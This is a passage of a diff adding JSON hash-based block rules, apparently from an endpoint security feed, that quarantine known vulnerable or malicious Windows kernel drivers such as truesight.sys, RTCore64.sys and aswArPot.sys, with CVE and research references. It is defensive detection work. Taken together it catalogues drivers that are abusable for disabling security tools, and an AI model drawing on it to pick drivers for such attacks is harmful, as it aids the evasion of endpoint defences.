+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4089a7db28609073dc3ed733ea83b6334923ddd635b7b9153196b2f6489344c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85328622-6c71-5e6e-b34b-92e2ec2cee3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472202Z",
+ "creation_date": "2026-03-23T11:45:31.472205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472214Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed1123884c56f51ceeff4b8436b0daca4345bea8d3be6d910d37ef36d97adc68",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8532b569-9f2d-5490-99c2-813354ca3843",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607997Z",
+ "creation_date": "2026-03-23T11:45:29.607999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "606beced7746cdb684d3a44f41e48713c6bbe5bfb1486c52b5cca815e99d31b4",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85353b41-8fbe-58d1-bb94-eb918086deec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489652Z",
+ "creation_date": "2026-03-23T11:45:31.489655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489663Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "981890ee9c10c9885b0e18bab66a1edc90873bc71f332df8c1569a935044bab4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85376a79-eda7-50f1-9c1a-81f7859b5d7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826650Z",
+ "creation_date": "2026-03-23T11:45:31.826652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59af1616a5d287df7af458ea857bbff6ffa096ca3161c1576ba0a9c0a8ec6136",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8537c540-a2ea-56aa-b25d-980270622e0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474482Z",
+ "creation_date": "2026-03-23T11:45:31.474486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2810d5f117de53be7460cdf9cb842e205bc57ecd1ac0f9a75cce6bf24a7679ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "854406d2-c011-542d-8da2-584a3c97bea3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477696Z",
+ "creation_date": "2026-03-23T11:45:30.477699Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e85cf32562a47d51827b21ab1e7f8c26c0dbd1cd86272f3cc64caae61a7e5fb",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "854ecd33-c255-5dd9-aab6-e3c9580d000a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825558Z",
+ "creation_date": "2026-03-23T11:45:30.825561Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74bcd33f80f319470a1953ba5ff5aa472bb608060f899823714debfec67e3f55",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85536b3c-6500-58f7-81c0-ad8f3825c716",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817329Z",
+ "creation_date": "2026-03-23T11:45:30.817331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0e2a4bf10a9428888e043fa40f7af74a963ed663c6bf4e2f136e39c41f606db",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8558761d-66f6-5c6d-87fc-42eeae05a614",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969096Z",
+ "creation_date": "2026-03-23T11:45:29.969100Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1273b74c3c1553eaa92e844fbd51f716356cc19cf77c2c780d4899ec7738fbd1",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "855bcbfa-d741-57a5-baf9-338ad2cb8950",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621263Z",
+ "creation_date": "2026-03-23T11:45:29.621265Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "856d3bc6-9c51-5de7-a640-944db2ac5a95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823767Z",
+ "creation_date": "2026-03-23T11:45:31.823769Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823775Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c98d33a785d0ea8461d8ccc68e6a185ee47671bd798f027a758e6658cf67129",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85749656-42ba-593a-b771-5b6133d17ea9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483180Z",
+ "creation_date": "2026-03-23T11:45:31.483184Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca18d6a7d349fce5d87c8df1cb134dc8a64ac30c52d8007959d91a9e18fb1290",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "857d144a-9ab9-5c26-b738-47b91a6c0165",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483847Z",
+ "creation_date": "2026-03-23T11:45:31.483851Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04f301e64c65392488add6711527ab76955cc5835691701fa16ae080b6366eb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8585827a-b81b-577d-8189-521286e613ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481496Z",
+ "creation_date": "2026-03-23T11:45:30.481499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9399f35b90f09b41f9eeda55c8e37f6d1cb22de6e224e54567d1f0865a718727",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8585c362-f637-53f1-bb5f-1849cf020c6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979394Z",
+ "creation_date": "2026-03-23T11:45:29.979396Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "770f33259d6fb10f4a32d8a57d0d12953e8455c72bb7b60cb39ce505c507013a",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85911e54-9823-50fc-8d0d-62d283e1c39b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475100Z",
+ "creation_date": "2026-03-23T11:45:30.475103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19e80663f055a038621c6de731151e4e8d6f42fde359efaf2ddeb49c62e317c4",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8597c034-1310-5a1e-a25b-573795d15efc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809674Z",
+ "creation_date": "2026-03-23T11:45:31.809677Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2647489235835128e939e3d49d6ec9369c09256e47b2c647a73a730346a3954c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85a0def7-df67-5127-a898-abc2cdc9fd66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608422Z",
+ "creation_date": "2026-03-23T11:45:29.608424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85b845e6-ef75-5bf9-aad8-d79d22262657",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151730Z",
+ "creation_date": "2026-03-23T11:45:31.151732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4021068436795b26ebf4438a76e131f1630a95fc688380eee09c86f3d4ce6c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85b8522c-69e1-5c3b-93b1-ef3c20c621b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615972Z",
+ "creation_date": "2026-03-23T11:45:29.615974Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615979Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073",
+ "comment": "TOSHIBA BIOs update vulnerable driver (aka NCHGBIOS2x64.SYS)",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85b9b4ad-ba4c-56ad-aca9-135620125c08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974247Z",
+ "creation_date": "2026-03-23T11:45:29.974249Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66539655171ddff02d8134241c58a53de3faa6467db7be14131e04b99ef33cee",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85c0cc41-8fab-590c-984f-dfcb0aff69c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809787Z",
+ "creation_date": "2026-03-23T11:45:31.809790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5913062e399ea3ae003c55025eceed37270932168dc514f6ca7d03c87e5b804f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "85c40e2b-8884-5494-b52a-c654a7727055",
+ "test_maturity_current_count": 0,
